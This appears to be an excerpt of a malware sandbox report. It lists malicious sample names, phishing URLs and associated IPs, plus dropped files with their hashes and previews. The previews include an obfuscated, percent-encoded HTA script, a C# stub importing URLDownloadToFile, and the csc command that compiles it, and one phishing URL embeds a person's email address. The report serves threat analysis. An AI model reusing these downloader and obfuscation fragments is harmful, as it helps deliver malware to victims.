                                                                        • 172.67.216.167
                                                                        htZgRRla8S.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.206.64
                                                                        0TGy7VIqx7CSab5o.lNK.lnkGet hashmaliciousUnknownBrowse
                                                                        • 172.67.185.252
                                                                        https://es-proposal.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                                                        • 104.21.112.1
                                                                        http://ebaumsworld.comGet hashmaliciousUnknownBrowse
                                                                        • 104.17.159.113
                                                                        https://mavenclinic.quatrix.itGet hashmaliciousUnknownBrowse
                                                                        • 104.18.20.58
                                                                        http://mavenclinic.quatrix.itGet hashmaliciousUnknownBrowse
                                                                        • 104.18.21.58
                                                                        https://morgans-proposal-site.webflow.io/Get hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                                                        • 172.64.151.8
                                                                        https://Scotts2fa.solitran.ru/JtZiK3LK/#Dmark.ochs@scotts.comGet hashmaliciousUnknownBrowse
                                                                        • 104.17.25.14
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        05af1f5ca1b87cc9cc9b25185115607d510005940.docx.docGet hashmaliciousUnknownBrowse
                                                                        • 151.101.1.137
                                                                        • 151.101.65.137
                                                                        invoice09850.xlsGet hashmaliciousRemcosBrowse
                                                                        • 151.101.1.137
                                                                        • 151.101.65.137
                                                                        Invoice A037.xlsGet hashmaliciousUnknownBrowse
                                                                        • 151.101.1.137
                                                                        • 151.101.65.137
                                                                        Request for quote.docGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 151.101.1.137
                                                                        • 151.101.65.137
                                                                        NESTLE_MEXICO_Purchase_Order_10122024.xlsGet hashmaliciousUnknownBrowse
                                                                        • 151.101.1.137
                                                                        • 151.101.65.137
                                                                        FATR98765678000.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 151.101.1.137
                                                                        • 151.101.65.137
                                                                        Orden_de_Compra_Nmero_6782929219.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                        • 151.101.1.137
                                                                        • 151.101.65.137
                                                                        Payment Confirmation..docmGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 151.101.1.137
                                                                        • 151.101.65.137
                                                                        Potvrda_o_uplati.docx.docGet hashmaliciousUnknownBrowse
                                                                        • 151.101.1.137
                                                                        • 151.101.65.137
                                                                        Estado de cuenta.xlsGet hashmaliciousXenoRATBrowse
                                                                        • 151.101.1.137
                                                                        • 151.101.65.137
                                                                        7dcce5b76c8b17472d024758970a406b510005940.docx.docGet hashmaliciousUnknownBrowse
                                                                        • 104.21.34.183
                                                                        • 172.67.163.184
                                                                        Document.xlaGet hashmaliciousUnknownBrowse
                                                                        • 104.21.34.183
                                                                        • 172.67.163.184
                                                                        xeroxscan.DocxGet hashmaliciousUnknownBrowse
                                                                        • 104.21.34.183
                                                                        • 172.67.163.184
                                                                        xeroxscan.DocxGet hashmaliciousUnknownBrowse
                                                                        • 104.21.34.183
                                                                        • 172.67.163.184
                                                                        invoice09850.xlsGet hashmaliciousRemcosBrowse
                                                                        • 104.21.34.183
                                                                        • 172.67.163.184
                                                                        Document.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                        • 104.21.34.183
                                                                        • 172.67.163.184
                                                                        Invoice A037.xlsGet hashmaliciousUnknownBrowse
                                                                        • 104.21.34.183
                                                                        • 172.67.163.184
                                                                        tqkdMdv2zO.docGet hashmaliciousXenoRATBrowse
                                                                        • 104.21.34.183
                                                                        • 172.67.163.184
                                                                        Document.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                        • 104.21.34.183
                                                                        • 172.67.163.184
                                                                        Estado.de.cuenta.xlsGet hashmaliciousAveMaria, UACMeBrowse
                                                                        • 104.21.34.183
                                                                        • 172.67.163.184
                                                                        No context
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):15189
                                                                        Entropy (8bit):5.0343247648743
                                                                        Encrypted:false
                                                                        SSDEEP:384:nWraVoGIpN6KQkj2Lkjh4iUxTnaVjvCnS/OdBmRWDf:nW+V3IpNBQkj2Oh4iUxDaVjvCnS/OdBD
                                                                        MD5:7BC3FB6565E144A52C5F44408D5D80DF
                                                                        SHA1:C3C443BF9F29EAA84B0A580FD5469F4C5CC57F77
                                                                        SHA-256:EF6A75C051D70322EDCD5A89E6398CC00E3D860E87A0C7981310D30837CBA495
                                                                        SHA-512:D0A936BAF2277884518EDF4729F88DA74C7BAA5BBB58C1060CE66DE92A23694EA993CA69D8820816C5D28182E9A38EE59DE821EE3A73F0D85DBBC74D406285A5
                                                                        Malicious:false
                                                                        Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........V.7...?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet.........._.7...[...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSWorkflowUtility\
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):64
                                                                        Entropy (8bit):0.34726597513537405
                                                                        Encrypted:false
                                                                        SSDEEP:3:Nlll:Nll
                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                        Malicious:false
                                                                        Preview:@...e...........................................................
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:HTML document, ASCII text, with very long lines (65450), with CRLF line terminators
                                                                        Category:modified
                                                                        Size (bytes):82534
                                                                        Entropy (8bit):2.63019013871546
                                                                        Encrypted:false
                                                                        SSDEEP:768:tmbUZA+cT/RVeU2Dx6AyZ6LAuAHAgxLiFZpd0LTna8/GdHz6kXd0LcRPi+Bkqr93:tL
                                                                        MD5:FCCAB384CF7D38618313385C0E22638B
                                                                        SHA1:6E0EFBB76A4D4B39A82B7D84393F399EA431B07E
                                                                        SHA-256:FC357D0488D2BE1A5A49893D842E24D303250346DAD592F6B1C8A9511EDC15D2
                                                                        SHA-512:72C9BA041CBEBA138A2E02AC8CCB726C58ABAA834386A09C203B9E9F9759E0F4C6E5F2AB3C29AB05F93E573195ADB8E43A8A89811505084851EFF6748F28A4AF
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_Obshtml, Description: Yara detected obfuscated html page, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood[1].hta, Author: Joe Security
                                                                        Preview:<Script Language='Javascript'>.. HTML Encryption provided by tufat.com -->.. ..document.write(unescape('%3C%53%63%72%69%70%74%20%4C%61%6E%67%75%61%67%65%3D%27%4A%61%76%61%73%63%72%69%70%74%27%3E%0A%3C%21%2D%2D%20%48%54%4D%4C%20%45%6E%63%72%79%70%74%69%6F%6E%20%70%72%6F%76%69%64%65%64%20%62%79%20%74%75%66%61%74%2E%63%6F%6D%20%2D%2D%3E%0A%3C%21%2D%2D%0A%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%27%25%33%43%25%32%31%25%34%34%25%34%46%25%34%33%25%35%34%25%35%39%25%35%30%25%34%35%25%32%30%25%36%38%25%37%34%25%36%44%25%36%43%25%33%45%25%30%41%25%33%43%25%36%44%25%36%35%25%37%34%25%36%31%25%32%30%25%36%38%25%37%34%25%37%34%25%37%30%25%32%44%25%36%35%25%37%31%25%37%35%25%36%39%25%37%36%25%33%44%25%32%32%25%35%38%25%32%44%25%35%35%25%34%31%25%32%44%25%34%33%25%36%46%25%36%44%25%37%30%25%36%31%25%37%34%25%36%39%25%36%32%25%36%43%25%36%35%25%32%32%25%32%30%25%36%33%25%36%46%25%36%45%25%37%34%25%36%35%25%36%45%25%37%34%25%33%44%25%32%32%25%34%39%25%34%35%25%33%
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (3102), with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):153774
                                                                        Entropy (8bit):3.794572563673094
                                                                        Encrypted:false
                                                                        SSDEEP:3072:rhOJJc6EynAswUs9Oau841fvkpWKj5fhOJJc6EynAswUs9Oau841fvkpWKjhhOJw:rOLEIpwPRs36WKJOLEIpwPRs36WKtOLs
                                                                        MD5:61BCBE69140CDEE35AC40F1D97773746
                                                                        SHA1:BB5D746ECA7A18890B642E6952EB9C5F71DEDAAA
                                                                        SHA-256:D68723EDCF3FF4F0C7DED177C7EEBD74DF498B8D16B111FAC54F1C11E37C93CF
                                                                        SHA-512:303EE3B3B8620F536C3E298BD65557BADF251870CA46656741C8D787A351F3ABCA94FE39BB701563AEF9C7C85F89BBDB447704E1F5BCE1B63701F575DB5E4B0B
                                                                        Malicious:false
                                                                        Preview:...... . . . .....c.U.U.O.W.U.v.z.v.f.n.p.h.B.m. .=. .".W.x.Q.e.K.L.L.v.b.W.N.b.v.Q.k.".....c.c.e.U.J.o.G.b.k.K.G.h.L.m.d. .=. .".G.W.L.z.L.p.e.L.W.t.O.U.i.G.K.".....r.K.W.i.K.P.K.W.q.W.W.e.N.c.W. .=. .".B.K.c.L.a.K.r.W.Z.i.K.h.W.A.p.".........a.o.k.l.L.q.d.L.a.p.i.s.W.c.G. .=. .".p.n.W.L.n.A.s.Q.e.n.Z.J.j.B.p.".....v.U.S.i.W.c.i.K.S.m.L.B.G.q.j. .=. .".f.p.b.K.K.P.m.n.e.k.k.L.W.u.k.".....i.U.c.A.W.u.I.L.K.S.K.U.L.u.j. .=. .".r.L.b.W.i.U.G.R.o.n.r.m.T.U.q.".....H.c.J.K.W.k.h.i.i.K.c.J.G.G.A. .=. .".G.k.s.Z.W.v.e.O.c.b.L.x.W.i.R.".....z.e.m.L.K.b.L.A.K.A.h.W.e.o.f. .=. .".C.p.i.W.z.G.W.d.c.s.K.N.o.l.K.".....x.L.p.x.i.K.L.o.o.L.m.u.t.m.h. .=. .".J.t.h.G.c.T.L.e.x.m.L.W.c.W.i.".....c.q.B.a.L.h.Z.U.I.C.N.h.K.b.l. .=. .".e.r.f.W.K.L.e.g.L.B.P.b.f.U.W.".....W.q.f.K.z.h.K.b.N.e.a.K.g.L.W. .=. .".x.W.L.f.W.G.i.C.G.C.q.k.c.e.c.".....q.K.I.k.b.p.t.p.b.C.W.U.K.G.u. .=. .".u.h.m.P.a.c.t.n.W.S.W.H.G.G.W.".....R.z.m.R.v.L.L.O.K.G.J.a.x.W.W. .=. .".u.c.a.z.B.e.l.o.Z.o.h.d.K.c.z.".....L.n.G.N.U.Z.T.m.
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                        Category:dropped
                                                                        Size (bytes):1293620
                                                                        Entropy (8bit):4.563127917199792
                                                                        Encrypted:false
                                                                        SSDEEP:6144:HepUelSAzNeNpVAZSedri2/Op4mD3f5ReZdZJElOFmkDrvwA2w4Meh/q4MmuRDrM:HepRlSPiS4ri2/lmzCJEuL1eU1muq
                                                                        MD5:F71C973B5E362DFD6408D6C009E5643E
                                                                        SHA1:24B3CE67B31BFD4791287932206D54C73489424E
                                                                        SHA-256:27D0986B7EC233689490135118670F01325F21DFD6F60492AF5D62C7CF1E3045
                                                                        SHA-512:4C3F506BC4313437C9194EED3CD5AB6616490AE376FC61DD38D8E00F975C41A23FC8D322E41CFBEC380F04F49ADF6E77A3B22BB5C96EBE714F5713B09838F1F4
                                                                        Malicious:false
                                                                        Preview:....l...........%...............@m..?... EMF....4....!..1...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                        Category:dropped
                                                                        Size (bytes):8084
                                                                        Entropy (8bit):2.5551694039574895
                                                                        Encrypted:false
                                                                        SSDEEP:96:j+RiOO++Z39FAcRwxBdEtzBfCC7Boff8oBJ6ANQ4HJV:jtGNOzBArH
                                                                        MD5:721E8AAC81F0A6D4659831CB8194D668
                                                                        SHA1:6BE0CEFAEC9F0B1EAD9DE03C8D4679767CF8B549
                                                                        SHA-256:E52DF310BB20C42F738A3C8E03ED4110CB795B8A07AE5D4E474EA075564B1622
                                                                        SHA-512:24CACEED3153493E34988C35628FAA2C198C9B13AFDD8ABC214EFBA0ACCD0579BADCD5EB0F76F5BDA16D3A279DB4DF4BB218ABD5FFD751C6E62676BD1AAEF2E7
                                                                        Malicious:false
                                                                        Preview:....l.........../...n............9...... EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o...'.......................%...........................................................L...d...........>...............q.......!..............?...........?................................R...p...................................A.r.i.a.l...............................................
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                        Category:dropped
                                                                        Size (bytes):44256
                                                                        Entropy (8bit):3.15066292565687
                                                                        Encrypted:false
                                                                        SSDEEP:384:IhpMW5NFNimpUIuOjwTsiyGGiugBhUErpxTORe4tyIWY5:BWzi+8+GGidBhUErpxTORe4tyI9
                                                                        MD5:F1EC2E98B0F577B675156B13DCF94105
                                                                        SHA1:4FF2D02051E92771FBB245BA8095C80148A0F61A
                                                                        SHA-256:66AFB9C12E20A08F9A713C366EDE8A9CD8F4A93B7D7BFC76205013C28A3250E9
                                                                        SHA-512:6E442DB49BF2A429AD2CA7CB3804D79791C1E1FEB414F69FDDD58042E98C5AA5BFC1C751713DB76DD58DC9F3CAC3A7C491228797A909F8FD0291048E8F2FC9BE
                                                                        Malicious:false
                                                                        Preview:....l................................ .. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........................m...-...!..............?...........?................................R...p.................................. A.r.i.a.l...............................................
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                        Category:dropped
                                                                        Size (bytes):109544
                                                                        Entropy (8bit):4.282675970330063
                                                                        Encrypted:false
                                                                        SSDEEP:768:I4KlWqWxZiDQ4hHdCUeHxCDJB9Cnh3KCg0F9BV:I42WxF4MyeKCV
                                                                        MD5:F7B9A8F20E64B2CB6B572BCBA5866236
                                                                        SHA1:2F092A0A518639332BE76BF60DBB966AC331D356
                                                                        SHA-256:72447B22A4BBC05B9E9183DF2ADB712AB51C3A45C6247C2303024197D1623F57
                                                                        SHA-512:4A78624A9EB02208F3F30D03CC53EBE00BDD2C59E8F7719E35E706D51CD2F8D0D330BE6D6FAD2A9652536F888CB99E0CBE1E3B97A05EA65CB5914C37C501B728
                                                                        Malicious:false
                                                                        Preview:....l...............r............C...a.. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s...'...............ZZZ.....%...................ZZZ.....................................L...d...............p...............q...!..............?...........?................................'...............2.......%...........(...................2...L...d.......p...............p.......
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                        Category:dropped
                                                                        Size (bytes):13284
                                                                        Entropy (8bit):2.721890413361754
                                                                        Encrypted:false
                                                                        SSDEEP:96:9pyRiCCyydtY5YkBJYstgWqjmLRQS1lkQJ8/tIdSUsQ5lV:9joObWPb1pGpQR
                                                                        MD5:64389AE456210E7353BD9F7D9C8EBB26
                                                                        SHA1:2E2A820EEC50A0CAF659C8A1747A2C161A81A067
                                                                        SHA-256:26F6FE29563F2DE0D66D9EB2F963F00CBA0211E9F1DA8BBCDC9426E76B328ACE
                                                                        SHA-512:FF679773F635DBD0FC940B880D04D77FB18786EA566CA83A348CBA36FA82EAFFD1AA76D9D4871C66580AED5FD65A8187C29C3A0BBAD8E38D0C83CA2C7886D5D7
                                                                        Malicious:false
                                                                        Preview:....l...........#...V...........Z&...... EMF.....3..K.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................$...W..."...........!...............................................$...W..."...........!...............................................$...W..."...........!...............................................$...W..."...........!...............................................$...W...R...p.................................. C.a.l.i.b.r.i........................................................................................'/....h./...'/........................h./.............../.N.'/.............m'/../.............../......./......./...'/........../.../..'/
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                        Category:dropped
                                                                        Size (bytes):1293620
                                                                        Entropy (8bit):4.563127917199792
                                                                        Encrypted:false
                                                                        SSDEEP:6144:HepUelSAzNeNpVAZSedri2/Op4mD3f5ReZdZJElOFmkDrvwA2w4Meh/q4MmuRDrM:HepRlSPiS4ri2/lmzCJEuL1eU1muq
                                                                        MD5:F71C973B5E362DFD6408D6C009E5643E
                                                                        SHA1:24B3CE67B31BFD4791287932206D54C73489424E
                                                                        SHA-256:27D0986B7EC233689490135118670F01325F21DFD6F60492AF5D62C7CF1E3045
                                                                        SHA-512:4C3F506BC4313437C9194EED3CD5AB6616490AE376FC61DD38D8E00F975C41A23FC8D322E41CFBEC380F04F49ADF6E77A3B22BB5C96EBE714F5713B09838F1F4
                                                                        Malicious:false
                                                                        Preview:....l...........%...............@m..?... EMF....4....!..1...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                        Category:dropped
                                                                        Size (bytes):44256
                                                                        Entropy (8bit):3.147465798679962
                                                                        Encrypted:false
                                                                        SSDEEP:384:j1W5NF0vUXfOjwTsiyGGiugBhUErpxTORe4tyJ2c:ZWYW+GGidBhUErpxTORe4ty5
                                                                        MD5:36D8FF25D14E7E2FBB1968E952FF9C17
                                                                        SHA1:E3BD7140DA6CAD87C5A1D5417DFBDD7B0E67B110
                                                                        SHA-256:305DCBFBEB9FFEE587E061D779CA1DDF31939ECD64EEE7D8A22BA9D640B48633
                                                                        SHA-512:B4B753222F617F78B36949BD9F37E13D68D9FD7367484BEE799F0D7AE38E1705E997A6409251BC2B9830012536FBD08C3C6CB7411D9122F939833F38E303DCBF
                                                                        Malicious:false
                                                                        Preview:....l................................ .. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........................m...-...!..............?...........?................................R...p.................................. A.r.i.a.l...............................................
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                        Category:dropped
                                                                        Size (bytes):13284
                                                                        Entropy (8bit):2.721890413361754
                                                                        Encrypted:false
                                                                        SSDEEP:96:9pyRiCCyydtY5YkBJYstgWqjmLRQS1lkQJ8/tIdSUsQ5lV:9joObWPb1pGpQR
                                                                        MD5:64389AE456210E7353BD9F7D9C8EBB26
                                                                        SHA1:2E2A820EEC50A0CAF659C8A1747A2C161A81A067
                                                                        SHA-256:26F6FE29563F2DE0D66D9EB2F963F00CBA0211E9F1DA8BBCDC9426E76B328ACE
                                                                        SHA-512:FF679773F635DBD0FC940B880D04D77FB18786EA566CA83A348CBA36FA82EAFFD1AA76D9D4871C66580AED5FD65A8187C29C3A0BBAD8E38D0C83CA2C7886D5D7
                                                                        Malicious:false
                                                                        Preview:....l...........#...V...........Z&...... EMF.....3..K.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................$...W..."...........!...............................................$...W..."...........!...............................................$...W..."...........!...............................................$...W..."...........!...............................................$...W...R...p.................................. C.a.l.i.b.r.i........................................................................................'/....h./...'/........................h./.............../.N.'/.............m'/../.............../......./......./...'/........../.../..'/
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                        Category:dropped
                                                                        Size (bytes):8084
                                                                        Entropy (8bit):2.5551694039574895
                                                                        Encrypted:false
                                                                        SSDEEP:96:j+RiOO++Z39FAcRwxBdEtzBfCC7Boff8oBJ6ANQ4HJV:jtGNOzBArH
                                                                        MD5:721E8AAC81F0A6D4659831CB8194D668
                                                                        SHA1:6BE0CEFAEC9F0B1EAD9DE03C8D4679767CF8B549
                                                                        SHA-256:E52DF310BB20C42F738A3C8E03ED4110CB795B8A07AE5D4E474EA075564B1622
                                                                        SHA-512:24CACEED3153493E34988C35628FAA2C198C9B13AFDD8ABC214EFBA0ACCD0579BADCD5EB0F76F5BDA16D3A279DB4DF4BB218ABD5FFD751C6E62676BD1AAEF2E7
                                                                        Malicious:false
                                                                        Preview:....l.........../...n............9...... EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o...'.......................%...........................................................L...d...........>...............q.......!..............?...........?................................R...p...................................A.r.i.a.l...............................................
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:very short file (no magic)
                                                                        Category:dropped
                                                                        Size (bytes):1
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3:U:U
                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                        Malicious:false
                                                                        Preview:1
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:very short file (no magic)
                                                                        Category:dropped
                                                                        Size (bytes):1
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3:U:U
                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                        Malicious:false
                                                                        Preview:1
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:very short file (no magic)
                                                                        Category:dropped
                                                                        Size (bytes):1
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3:U:U
                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                        Malicious:false
                                                                        Preview:1
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (370)
                                                                        Category:dropped
                                                                        Size (bytes):483
                                                                        Entropy (8bit):3.7055245437561335
                                                                        Encrypted:false
                                                                        SSDEEP:6:V/DsYLDS81zumywWHMGbjQXReKJ8SRHy4H1r3TbAc/uc4y:V/DTLDfu1wXfHRn8c6y
                                                                        MD5:567F2C2AF7886BD10A602EDEA0DBB33B
                                                                        SHA1:AAA2F286D79889F3AE9CD98B9B728F832A0981BD
                                                                        SHA-256:942B49DF85678ADA85046144CAC22EE63E865763EA87B1AB1AA56E86E8FE2DAC
                                                                        SHA-512:8CE20E4DFF36398AA1B520C2959907662216003C20085CC6ECF1E612E4005683B187AFBE423C3D7A3BDB7DA16995526894F264EC4094D3741573EEBC7FC35C4C
                                                                        Malicious:false
                                                                        Preview:.using System;.using System.Runtime.InteropServices;..namespace eG.{. public class SrgpCje. {. [DllImport("urlmon.dll", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr DQJ,string QDlMltZdCJ,string DmhIGJsMxfC,uint l,IntPtr CvkghJ);.. }..}.
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):369
                                                                        Entropy (8bit):5.252792983182365
                                                                        Encrypted:false
                                                                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23f6MBCoUzxs7+AEszIP23f6MBC2:p37Lvkmb6KzwoUWZEow2
                                                                        MD5:73316EEA36090336473EE6AFF3ECB5C1
                                                                        SHA1:3AD9ECDF55A0D1BFBE493CA69524824ED118FD29
                                                                        SHA-256:F698BA932168382F56F63574088D156463A336BDB069A8CE3AFF759FD7C829AB
                                                                        SHA-512:CD873559130B5E0982A7F0E0C6C569C07BF9ABE204B60097531D606DEC83D1016F767936FB4C222D0C54B5090BB4591CC442BFCB85A7AC99698730D766309BD0
                                                                        Malicious:false
                                                                        Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\5djzgayy\5djzgayy.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\5djzgayy\5djzgayy.0.cs"
                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):3072
                                                                        Entropy (8bit):2.835779101290385
                                                                        Encrypted:false
                                                                        SSDEEP:24:etGSwPBe5ekrl8y72fukzOCa0H7Hf9LWtkZfTRDgRCbCZ0WI+ycuZhNtakSrPNnq:6/skr+vf3OCb/lZJd8MbCZX1ulta3Bq
                                                                        MD5:E2A59730C24419434A590ED0B0BB1D90
                                                                        SHA1:9B7179AF6EE891F514882090F2A670FEDF590BB2
                                                                        SHA-256:A3149DC2FAE2806575459327C387696861CE858FD1D76F549D5B6BCBF7AE4BC2
                                                                        SHA-512:9E95769C84DBF5D4A6A723D5A7BB62C06B03BC672DAD274EF2EBE634B017FF29A5CFBFBB47F2FF0E6BC8C7DE67910F7A747DF5C155F1C4278423B420051C5C60
                                                                        Malicious:true
